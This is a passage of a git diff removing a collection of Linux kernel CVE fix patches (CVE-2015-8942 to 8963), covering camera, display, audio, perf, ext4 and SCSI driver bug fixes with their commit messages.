-+ if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i]) >=
-+ MAX_NUM_STREAM) {
- return -EINVAL;
- }
- stream_info = &axi_data->stream_info[
-@@ -1567,8 +1580,8 @@ static int msm_isp_start_axi_stream(struct vfe_device *vfe_dev,
- return -EINVAL;
-
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-- if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-- > MAX_NUM_STREAM) {
-+ if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i]) >=
-+ MAX_NUM_STREAM) {
- return -EINVAL;
- }
- stream_info = &axi_data->stream_info[
-@@ -1651,8 +1664,8 @@ static int msm_isp_stop_axi_stream(struct vfe_device *vfe_dev,
- return -EINVAL;
-
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-- if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-- > MAX_NUM_STREAM) {
-+ if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i]) >=
-+ MAX_NUM_STREAM) {
- return -EINVAL;
- }
- stream_info = &axi_data->stream_info[
-@@ -1916,8 +1929,8 @@ int msm_isp_update_axi_stream(struct vfe_device *vfe_dev, void *arg)
- for (i = 0; i < update_cmd->num_streams; i++) {
- update_info = &update_cmd->update_info[i];
- /*check array reference bounds*/
-- if (HANDLE_TO_IDX(update_info->stream_handle)
-- > MAX_NUM_STREAM) {
-+ if (HANDLE_TO_IDX(update_info->stream_handle) >=
-+ MAX_NUM_STREAM) {
- return -EINVAL;
- }
- stream_info = &axi_data->stream_info[
-@@ -2082,7 +2095,9 @@ void msm_isp_process_axi_irq(struct vfe_device *vfe_dev,
- comp_info = &axi_data->composite_info[i];
- wm_mask &= ~(comp_info->stream_composite_mask);
- if (comp_mask & (1 << i)) {
-- if (!comp_info->stream_handle) {
-+ stream_idx = HANDLE_TO_IDX(comp_info->stream_handle);
-+ if ((!comp_info->stream_handle) ||
-+ (stream_idx >= MAX_NUM_STREAM)) {
- pr_err("%s: Invalid handle for composite irq\n",
- __func__);
- continue;
-@@ -2118,12 +2133,13 @@ void msm_isp_process_axi_irq(struct vfe_device *vfe_dev,
-
- for (i = 0; i < axi_data->hw_info->num_wm; i++) {
- if (wm_mask & (1 << i)) {
-- if (!axi_data->free_wm[i]) {
-+ stream_idx = HANDLE_TO_IDX(axi_data->free_wm[i]);
-+ if ((!axi_data->free_wm[i]) ||
-+ (stream_idx >= MAX_NUM_STREAM)) {
- pr_err("%s: Invalid handle for wm irq\n",
- __func__);
- continue;
- }
-- stream_idx = HANDLE_TO_IDX(axi_data->free_wm[i]);
- stream_info = &axi_data->stream_info[stream_idx];
- ISP_DBG("%s: stream id %x frame id: 0x%x\n", __func__,
- stream_info->stream_id, stream_info->frame_id);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8942/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8942/ANY/0001.patch
deleted file mode 100644
index 7bb486f8..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8942/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 9ec380c06bbd79493828fcc3c876d8a53fd3369f Mon Sep 17 00:00:00 2001
-From: Iliya Varadzhakov
-Date: Fri, 13 Mar 2015 07:33:18 -0700
-Subject: msm: cpp: Update iommu handling
-
-CPP has to check for stream state before operate iommu
-contexts.
-
-Change-Id: I69e6266e1ff2d1cd93e7191f2c43c887154abae0
-Signed-off-by: Iliya Varadzhakov
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 784e882..96b1641 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2662,7 +2662,8 @@ STREAM_BUFF_END:
- break;
- }
- case VIDIOC_MSM_CPP_IOMMU_DETACH: {
-- if (cpp_dev->iommu_state == CPP_IOMMU_STATE_ATTACHED) {
-+ if ((cpp_dev->iommu_state == CPP_IOMMU_STATE_ATTACHED) &&
-+ (cpp_dev->stream_cnt == 0)) {
- iommu_detach_device(cpp_dev->domain,
- cpp_dev->iommu_ctx);
- cpp_dev->iommu_state = CPP_IOMMU_STATE_DETACHED;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8943/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8943/ANY/0001.patch
deleted file mode 100644
index 0121bbc2..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8943/ANY/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From ad376e4053b87bd58f62f45b6df2c5544bc21aee Mon Sep 17 00:00:00 2001
-From: Jayant Shekhar
-Date: Tue, 20 Jan 2015 16:12:43 +0530
-Subject: msm: mdss: Unmap only when buffer was mapped
-
-Currently buffer is unmapped if iommu is attached.
-This can lead to potential unmap issues if wrong
-addresses are sent and are tried to unmap without
-mapping. Hence ensure unmap is done only when
-buffer is mapped.
-
-Change-Id: I6d7f1eb1e951cd314a4c3c35551c87930af5118e
-Signed-off-by: Jayant Shekhar
----
- drivers/video/msm/mdss/mdss_mdp.h | 1 +
- drivers/video/msm/mdss/mdss_mdp_util.c | 4 +++-
- 2 files changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp.h b/drivers/video/msm/mdss/mdss_mdp.h
-index f5f5770..99ea0cd 100644
---- a/drivers/video/msm/mdss/mdss_mdp.h
-+++ b/drivers/video/msm/mdss/mdss_mdp.h
-@@ -279,6 +279,7 @@ struct mdss_mdp_img_data {
- u32 len;
- u32 flags;
- int p_need;
-+ bool mapped;
- struct file *srcp_file;
- struct ion_handle *srcp_ihdl;
- };
-diff --git a/drivers/video/msm/mdss/mdss_mdp_util.c b/drivers/video/msm/mdss/mdss_mdp_util.c
-index 01745fd..dd93dce 100644
---- a/drivers/video/msm/mdss/mdss_mdp_util.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_util.c
-@@ -502,7 +502,7 @@ int mdss_mdp_put_img(struct mdss_mdp_img_data *data)
- pr_err("invalid ion client\n");
- return -ENOMEM;
- } else {
-- if (is_mdss_iommu_attached()) {
-+ if (data->mapped) {
- int domain;
- if (data->flags & MDP_SECURE_OVERLAY_SESSION)
- domain = MDSS_IOMMU_DOMAIN_SECURE;
-@@ -515,6 +515,7 @@ int mdss_mdp_put_img(struct mdss_mdp_img_data *data)
- msm_ion_unsecure_buffer(iclient,
- data->srcp_ihdl);
- }
-+ data->mapped = false;
- }
- ion_free(iclient, data->srcp_ihdl);
- data->srcp_ihdl = NULL;
-@@ -593,6 +594,7 @@ int mdss_mdp_get_img(struct msmfb_data *img, struct mdss_mdp_img_data *data)
- if (ret && (domain == MDSS_IOMMU_DOMAIN_SECURE))
- msm_ion_unsecure_buffer(iclient,
- data->srcp_ihdl);
-+ data->mapped = true;
- } else {
- ret = ion_phys(iclient, data->srcp_ihdl, start,
- (size_t *) len);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8944/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8944/ANY/0001.patch
deleted file mode 100644
index 7bce069e..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8944/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From e758417e7c31b975c862aa55d0ceef28f3cc9104 Mon Sep 17 00:00:00 2001
-From: Biswajit Paul
-Date: Mon, 9 Feb 2015 15:21:12 -0800
-Subject: kernel: Restrict permissions of /proc/iomem.
-
-The permissions of /proc/iomem currently are -r--r--r--. Everyone can
-see its content. As iomem contains information about the physical memory
-content of the device, restrict the information only to root.
-
-Change-Id: If0be35c3fac5274151bea87b738a48e6ec0ae891
-CRs-Fixed: 786116
-Signed-off-by: Biswajit Paul
-Signed-off-by: Avijit Kanti Das
----
- kernel/resource.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/kernel/resource.c b/kernel/resource.c
-index a5a8086..91c35c3 100644
---- a/kernel/resource.c
-+++ b/kernel/resource.c
-@@ -153,7 +153,7 @@ static const struct file_operations proc_iomem_operations = {
- static int __init ioresources_init(void)
- {
- proc_create("ioports", 0, NULL, &proc_ioports_operations);
-- proc_create("iomem", 0, NULL, &proc_iomem_operations);
-+ proc_create("iomem", S_IRUSR, NULL, &proc_iomem_operations);
- return 0;
- }
- __initcall(ioresources_init);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8950/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8950/ANY/0001.patch
deleted file mode 100644
index 69f66afc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8950/ANY/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From 6e2c437a2d0a85d90d3db85a7471f99764f7bbf8 Mon Sep 17 00:00:00 2001
-From: Marek Szyprowski
-Date: Thu, 23 Apr 2015 12:46:16 +0100
-Subject: arm64: dma-mapping: always clear allocated buffers
-
-[ Upstream commit 6829e274a623187c24f7cfc0e3d35f25d087fcc5 ]
-
-Buffers allocated by dma_alloc_coherent() are always zeroed on Alpha,
-ARM (32bit), MIPS, PowerPC, x86/x86_64 and probably other architectures.
-It turned out that some drivers rely on this 'feature'. Allocated buffer
-might be also exposed to userspace with dma_mmap() call, so clearing it
-is desired from security point of view to avoid exposing random memory
-to userspace. This patch unifies dma_alloc_coherent() behavior on ARM64
-architecture with other implementations by unconditionally zeroing
-allocated buffer.
-
-CRs-Fixed: 1041735
-Change-Id: I74bf024e0f603ca8c0b05430dc2ee154d579cfb2
-Cc: # v3.14+
-Signed-off-by: Marek Szyprowski
-Signed-off-by: Will Deacon
-Signed-off-by: Sasha Levin
-Git-commit: a142e9641dcbead2c8845c949ad518acac96ed28
-Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
-[lmark@codeaurora.org: resolve merge conflicts]
-Signed-off-by: Liam Mark
----
- arch/arm64/mm/dma-mapping.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/arch/arm64/mm/dma-mapping.c b/arch/arm64/mm/dma-mapping.c
-index 9b4716e..2678f6e 100644
---- a/arch/arm64/mm/dma-mapping.c
-+++ b/arch/arm64/mm/dma-mapping.c
-@@ -88,6 +88,7 @@ static void *__alloc_from_pool(size_t size, struct page **ret_page)
- if (pageno < pool->nr_pages) {
- bitmap_set(pool->bitmap, pageno, count);
- ptr = pool->vaddr + PAGE_SIZE * pageno;
-+ memset(ptr, 0, size);
- *ret_page = pool->pages[pageno];
- } else {
- pr_err_once("ERROR: %u KiB atomic DMA coherent pool is too small!\n"
-@@ -208,6 +209,7 @@ static void *arm64_swiotlb_alloc_coherent(struct device *dev, size_t size,
-
- page = pfn_to_page(pfn);
- addr = page_address(page);
-+ memset(addr, 0, size);
-
- if (dma_get_attr(DMA_ATTR_NO_KERNEL_MAPPING, attrs) ||
- dma_get_attr(DMA_ATTR_STRONGLY_ORDERED, attrs)) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8951/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2015-8951/3.10/0001.patch
deleted file mode 100644
index 910b5c61..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8951/3.10/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From ccff36b07bfc49efc77b9f1b55ed2bf0900b1d5b Mon Sep 17 00:00:00 2001
-From: Vidyakumar Athota
-Date: Wed, 16 Dec 2015 15:42:39 -0800
-Subject: ASoC: msm-lsm-client: free lsm client data in msm_lsm_close
-
-Currently lsm client data is deallocated when q6lsm_open() fails
-which can cause memory corruption if lsm client data is accessed
-after freed. Fix this issue by deallocating the client data only
-in msm_lsm_close().
-
-Change-Id: If048c26a0ffd8a346a28622183cbf2ba1e7e5ff3
-Signed-off-by: Vidyakumar Athota
----
- include/sound/q6lsm.h | 1 +
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 10 +++++++---
- 2 files changed, 8 insertions(+), 3 deletions(-)
-
-diff --git a/include/sound/q6lsm.h b/include/sound/q6lsm.h
-index 6045b7f..d410a9b 100644
---- a/include/sound/q6lsm.h
-+++ b/include/sound/q6lsm.h
-@@ -71,6 +71,7 @@ struct lsm_client {
- uint16_t connect_to_port;
- uint8_t num_confidence_levels;
- uint8_t *confidence_levels;
-+ bool opened;
- bool started;
- dma_addr_t lsm_cal_phy_addr;
- uint32_t lsm_cal_size;
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index f0a164f..2337f91 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -747,10 +747,9 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- dev_err(rtd->dev,
- "%s: lsm open failed, %d\n",
- __func__, ret);
-- q6lsm_client_free(prtd->lsm_client);
-- kfree(prtd);
- return ret;
- }
-+ prtd->lsm_client->opened = true;
- dev_dbg(rtd->dev, "%s: Session_ID = %d, APP ID = %d\n",
- __func__,
- prtd->lsm_client->session,
-@@ -1697,6 +1696,7 @@ static int msm_lsm_open(struct snd_pcm_substream *substream)
- runtime->private_data = NULL;
- return -ENOMEM;
- }
-+ prtd->lsm_client->opened = false;
- return 0;
- }
-
-@@ -1769,7 +1769,10 @@ static int msm_lsm_close(struct snd_pcm_substream *substream)
- __func__);
- }
-
-- q6lsm_close(prtd->lsm_client);
-+ if (prtd->lsm_client->opened) {
-+ q6lsm_close(prtd->lsm_client);
-+ prtd->lsm_client->opened = false;
-+ }
- q6lsm_client_free(prtd->lsm_client);
-
- spin_lock_irqsave(&prtd->event_lock, flags);
-@@ -1777,6 +1780,7 @@ static int msm_lsm_close(struct snd_pcm_substream *substream)
- prtd->event_status = NULL;
- spin_unlock_irqrestore(&prtd->event_lock, flags);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8951/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2015-8951/3.18/0002.patch
deleted file mode 100644
index ea1052cc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8951/3.18/0002.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 0aed2b7e739f7e528ffd8dac3c0c14deb82c9acf Mon Sep 17 00:00:00 2001
-From: Vidyakumar Athota
-Date: Wed, 16 Dec 2015 15:42:39 -0800
-Subject: ASoC: msm-lsm-client: free lsm client data in msm_lsm_close
-
-Currently lsm client data is deallocated when q6lsm_open() fails
-which can cause memory corruption if lsm client data is accessed
-after freed. Fix this issue by deallocating the client data only
-in msm_lsm_close().
-
-Change-Id: If048c26a0ffd8a346a28622183cbf2ba1e7e5ff3
-Signed-off-by: Vidyakumar Athota
----
- include/sound/q6lsm.h | 1 +
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 10 +++++++---
- 2 files changed, 8 insertions(+), 3 deletions(-)
-
-diff --git a/include/sound/q6lsm.h b/include/sound/q6lsm.h
-index 7cb7e15..fb848bc 100644
---- a/include/sound/q6lsm.h
-+++ b/include/sound/q6lsm.h
-@@ -71,6 +71,7 @@ struct lsm_client {
- uint16_t connect_to_port;
- uint8_t num_confidence_levels;
- uint8_t *confidence_levels;
-+ bool opened;
- bool started;
- dma_addr_t lsm_cal_phy_addr;
- uint32_t lsm_cal_size;
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index 37775da..bcd26f6 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -746,10 +746,9 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- dev_err(rtd->dev,
- "%s: lsm open failed, %d\n",
- __func__, ret);
-- q6lsm_client_free(prtd->lsm_client);
-- kfree(prtd);
- return ret;
- }
-+ prtd->lsm_client->opened = true;
- dev_dbg(rtd->dev, "%s: Session_ID = %d, APP ID = %d\n",
- __func__,
- prtd->lsm_client->session,
-@@ -1690,6 +1689,7 @@ static int msm_lsm_open(struct snd_pcm_substream *substream)
- runtime->private_data = NULL;
- return -ENOMEM;
- }
-+ prtd->lsm_client->opened = false;
- return 0;
- }
-
-@@ -1762,7 +1762,10 @@ static int msm_lsm_close(struct snd_pcm_substream *substream)
- __func__);
- }
-
-- q6lsm_close(prtd->lsm_client);
-+ if (prtd->lsm_client->opened) {
-+ q6lsm_close(prtd->lsm_client);
-+ prtd->lsm_client->opened = false;
-+ }
- q6lsm_client_free(prtd->lsm_client);
-
- spin_lock_irqsave(&prtd->event_lock, flags);
-@@ -1770,6 +1773,7 @@ static int msm_lsm_close(struct snd_pcm_substream *substream)
- prtd->event_status = NULL;
- spin_unlock_irqrestore(&prtd->event_lock, flags);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8955/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8955/ANY/0001.patch
deleted file mode 100644
index dd63e79e..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8955/ANY/0001.patch
+++ /dev/null
@@ -1,111 +0,0 @@
-From 8fff105e13041e49b82f92eef034f363a6b1c071 Mon Sep 17 00:00:00 2001
-From: "Suzuki K. Poulose"
-Date: Tue, 17 Mar 2015 18:14:59 +0000
-Subject: arm64: perf: reject groups spanning multiple HW PMUs
-
-The perf core implicitly rejects events spanning multiple HW PMUs, as in
-these cases the event->ctx will differ. However this validation is
-performed after pmu::event_init() is called in perf_init_event(), and
-thus pmu::event_init() may be called with a group leader from a
-different HW PMU.
-
-The ARM64 PMU driver does not take this fact into account, and when
-validating groups assumes that it can call to_arm_pmu(event->pmu) for
-any HW event. When the event in question is from another HW PMU this is
-wrong, and results in dereferencing garbage.
-
-This patch updates the ARM64 PMU driver to first test for and reject
-events from other PMUs, moving the to_arm_pmu and related logic after
-this test. Fixes a crash triggered by perf_fuzzer on Linux-4.0-rc2, with
-a CCI PMU present:
-
-Bad mode in Synchronous Abort handler detected, code 0x86000006 -- IABT (current EL)
-CPU: 0 PID: 1371 Comm: perf_fuzzer Not tainted 3.19.0+ #249
-Hardware name: V2F-1XV7 Cortex-A53x2 SMM (DT)
-task: ffffffc07c73a280 ti: ffffffc07b0a0000 task.ti: ffffffc07b0a0000
-PC is at 0x0
-LR is at validate_event+0x90/0xa8
-pc : [<0000000000000000>] lr : [] pstate: 00000145
-sp : ffffffc07b0a3ba0
-
-[< (null)>] (null)
-[] armpmu_event_init+0x174/0x3cc
-[] perf_try_init_event+0x34/0x70
-[] perf_init_event+0xe0/0x10c
-[] perf_event_alloc+0x288/0x358
-[] SyS_perf_event_open+0x464/0x98c
-Code: bad PC value
-
-Also cleans up the code to use the arm_pmu only when we know
-that we are dealing with an arm pmu event.
-
-Cc: Will Deacon
-Acked-by: Mark Rutland
-Acked-by: Peter Ziljstra (Intel)
-Signed-off-by: Suzuki K. Poulose
-Signed-off-by: Will Deacon
----
- arch/arm64/kernel/perf_event.c | 21 +++++++++++++++------
- 1 file changed, 15 insertions(+), 6 deletions(-)
-
-diff --git a/arch/arm64/kernel/perf_event.c b/arch/arm64/kernel/perf_event.c
-index 25a5308..68a7415 100644
---- a/arch/arm64/kernel/perf_event.c
-+++ b/arch/arm64/kernel/perf_event.c
-@@ -322,22 +322,31 @@ out:
- }
-
- static int
--validate_event(struct pmu_hw_events *hw_events,
-- struct perf_event *event)
-+validate_event(struct pmu *pmu, struct pmu_hw_events *hw_events,
-+ struct perf_event *event)
- {
-- struct arm_pmu *armpmu = to_arm_pmu(event->pmu);
-+ struct arm_pmu *armpmu;
- struct hw_perf_event fake_event = event->hw;
- struct pmu *leader_pmu = event->group_leader->pmu;
-
- if (is_software_event(event))
- return 1;
-
-+ /*
-+ * Reject groups spanning multiple HW PMUs (e.g. CPU + CCI). The
-+ * core perf code won't check that the pmu->ctx == leader->ctx
-+ * until after pmu->event_init(event).
-+ */
-+ if (event->pmu != pmu)
-+ return 0;
-+
- if (event->pmu != leader_pmu || event->state < PERF_EVENT_STATE_OFF)
- return 1;
-
- if (event->state == PERF_EVENT_STATE_OFF && !event->attr.enable_on_exec)
- return 1;
-
-+ armpmu = to_arm_pmu(event->pmu);
- return armpmu->get_event_idx(hw_events, &fake_event) >= 0;
- }
-
-@@ -355,15 +364,15 @@ validate_group(struct perf_event *event)
- memset(fake_used_mask, 0, sizeof(fake_used_mask));
- fake_pmu.used_mask = fake_used_mask;
-
-- if (!validate_event(&fake_pmu, leader))
-+ if (!validate_event(event->pmu, &fake_pmu, leader))
- return -EINVAL;
-
- list_for_each_entry(sibling, &leader->sibling_list, group_entry) {
-- if (!validate_event(&fake_pmu, sibling))
-+ if (!validate_event(event->pmu, &fake_pmu, sibling))
- return -EINVAL;
- }
-
-- if (!validate_event(&fake_pmu, event))
-+ if (!validate_event(event->pmu, &fake_pmu, event))
- return -EINVAL;
-
- return 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8961/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8961/ANY/0001.patch
deleted file mode 100644
index 343a8b22..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8961/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 6934da9238da947628be83635e365df41064b09b Mon Sep 17 00:00:00 2001
-From: Lukas Czerner
-Date: Sat, 17 Oct 2015 22:57:06 -0400
-Subject: ext4: fix potential use after free in __ext4_journal_stop
-
-There is a use-after-free possibility in __ext4_journal_stop() in the
-case that we free the handle in the first jbd2_journal_stop() because
-we're referencing handle->h_err afterwards. This was introduced in
-9705acd63b125dee8b15c705216d7186daea4625 and it is wrong. Fix it by
-storing the handle->h_err value beforehand and avoid referencing
-potentially freed handle.
-
-Fixes: 9705acd63b125dee8b15c705216d7186daea4625
-Signed-off-by: Lukas Czerner
-Reviewed-by: Andreas Dilger
-Cc: stable@vger.kernel.org
----
- fs/ext4/ext4_jbd2.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/fs/ext4/ext4_jbd2.c b/fs/ext4/ext4_jbd2.c
-index d418431..e770c1ee 100644
---- a/fs/ext4/ext4_jbd2.c
-+++ b/fs/ext4/ext4_jbd2.c
-@@ -88,13 +88,13 @@ int __ext4_journal_stop(const char *where, unsigned int line, handle_t *handle)
- return 0;
- }
-
-+ err = handle->h_err;
- if (!handle->h_transaction) {
-- err = jbd2_journal_stop(handle);
-- return handle->h_err ? handle->h_err : err;
-+ rc = jbd2_journal_stop(handle);
-+ return err ? err : rc;
- }
-
- sb = handle->h_transaction->t_journal->j_private;
-- err = handle->h_err;
- rc = jbd2_journal_stop(handle);
-
- if (!err)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8962/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8962/ANY/0001.patch
deleted file mode 100644
index 105ef023..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8962/ANY/0001.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From f3951a3709ff50990bf3e188c27d346792103432 Mon Sep 17 00:00:00 2001
-From: Calvin Owens
-Date: Fri, 30 Oct 2015 16:57:00 -0700
-Subject: sg: Fix double-free when drives detach during SG_IO
-
-In sg_common_write(), we free the block request and return -ENODEV if
-the device is detached in the middle of the SG_IO ioctl().
-
-Unfortunately, sg_finish_rem_req() also tries to free srp->rq, so we
-end up freeing rq->cmd in the already free rq object, and then free
-the object itself out from under the current user.
-
-This ends up corrupting random memory via the list_head on the rq
-object. The most common crash trace I saw is this:
-
- ------------[ cut here ]------------
- kernel BUG at block/blk-core.c:1420!
- Call Trace:
- [] blk_put_request+0x5b/0x80
- [] sg_finish_rem_req+0x6b/0x120 [sg]
- [] sg_common_write.isra.14+0x459/0x5a0 [sg]
- [] ? selinux_file_alloc_security+0x48/0x70
- [] sg_new_write.isra.17+0x195/0x2d0 [sg]
- [] sg_ioctl+0x644/0xdb0 [sg]
- [] do_vfs_ioctl+0x90/0x520
- [] ? file_has_perm+0x97/0xb0
- [] SyS_ioctl+0x91/0xb0
- [] tracesys+0xdd/0xe2
- RIP [] __blk_put_request+0x154/0x1a0
-
-The solution is straightforward: just set srp->rq to NULL in the
-failure branch so that sg_finish_rem_req() doesn't attempt to re-free
-it.
-
-Additionally, since sg_rq_end_io() will never be called on the object
-when this happens, we need to free memory backing ->cmd if it isn't
-embedded in the object itself.
-
-KASAN was extremely helpful in finding the root cause of this bug.
-
-Signed-off-by: Calvin Owens
-Acked-by: Douglas Gilbert
-Signed-off-by: Martin K. Petersen
----
- drivers/scsi/sg.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 9d7b7db..503ab8b 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -787,8 +787,14 @@ sg_common_write(Sg_fd * sfp, Sg_request * srp,
- return k; /* probably out of space --> ENOMEM */
- }
- if (atomic_read(&sdp->detaching)) {
-- if (srp->bio)
-+ if (srp->bio) {
-+ if (srp->rq->cmd != srp->rq->__cmd)
-+ kfree(srp->rq->cmd);
-+
- blk_end_request_all(srp->rq, -EIO);
-+ srp->rq = NULL;
-+ }
-+
- sg_finish_rem_req(srp);
- return -ENODEV;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8963/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8963/ANY/0001.patch
deleted file mode 100644
index 3701d036..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8963/ANY/0001.patch
+++ /dev/null
@@ -1,96 +0,0 @@ -From 12ca6ad2e3a896256f086497a7c7406a547ee373 Mon Sep 17 00:00:00 2001 -From: Peter Zijlstra -Date: Tue, 15 Dec 2015 13:49:05 +0100 -Subject: perf: Fix race in swevent hash - -There's a race on CPU unplug where we free the swevent hash array -while it can still have events on. This will result in a -use-after-free which is BAD. - -Simply do not free the hash array on unplug. This leaves the thing -around and no use-after-free takes place. - -When the last swevent dies, we do a for_each_possible_cpu() iteration -anyway to clean these up, at which time we'll free it, so no leakage -will occur. - -Reported-by: Sasha Levin -Tested-by: Sasha Levin -Signed-off-by: Peter Zijlstra (Intel) -Cc: Arnaldo Carvalho de Melo -Cc: Frederic Weisbecker -Cc: Jiri Olsa -Cc: Linus Torvalds -Cc: Peter Zijlstra -Cc: Stephane Eranian -Cc: Thomas Gleixner -Cc: Vince Weaver -Signed-off-by: Ingo Molnar ---- - kernel/events/core.c | 20 +------------------- - 1 file changed, 1 insertion(+), 19 deletions(-) - -diff --git a/kernel/events/core.c b/kernel/events/core.c -index fd7de04..0a791a2 100644 ---- a/kernel/events/core.c -+++ b/kernel/events/core.c -@@ -6488,9 +6488,6 @@ struct swevent_htable { - - /* Recursion avoidance in each contexts */ - int recursion[PERF_NR_CONTEXTS]; -- -- /* Keeps track of cpu being initialized/exited */ -- bool online; - }; - - static DEFINE_PER_CPU(struct swevent_htable, swevent_htable); -@@ -6748,14 +6745,8 @@ static int perf_swevent_add(struct perf_event *event, int flags) - hwc->state = !(flags & PERF_EF_START); - - head = find_swevent_head(swhash, event); -- if (!head) { -- /* -- * We can race with cpu hotplug code. Do not -- * WARN if the cpu just got unplugged. 
-- */ -- WARN_ON_ONCE(swhash->online); -+ if (WARN_ON_ONCE(!head)) - return -EINVAL; -- } - - hlist_add_head_rcu(&event->hlist_entry, head); - perf_event_update_userpage(event); -@@ -6823,7 +6814,6 @@ static int swevent_hlist_get_cpu(struct perf_event *event, int cpu) - int err = 0; - - mutex_lock(&swhash->hlist_mutex); -- - if (!swevent_hlist_deref(swhash) && cpu_online(cpu)) { - struct swevent_hlist *hlist; - -@@ -9286,7 +9276,6 @@ static void perf_event_init_cpu(int cpu) - struct swevent_htable *swhash = &per_cpu(swevent_htable, cpu); - - mutex_lock(&swhash->hlist_mutex); -- swhash->online = true; - if (swhash->hlist_refcount > 0) { - struct swevent_hlist *hlist; - -@@ -9328,14 +9317,7 @@ static void perf_event_exit_cpu_context(int cpu) - - static void perf_event_exit_cpu(int cpu) - { -- struct swevent_htable *swhash = &per_cpu(swevent_htable, cpu); -- - perf_event_exit_cpu_context(cpu); -- -- mutex_lock(&swhash->hlist_mutex); -- swhash->online = false; -- swevent_hlist_release(swhash); -- mutex_unlock(&swhash->hlist_mutex); - } - #else - static inline void perf_event_exit_cpu(int cpu) { } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8964/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8964/ANY/0001.patch deleted file mode 100644 index 3da3aa42..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8964/ANY/0001.patch +++ /dev/null 
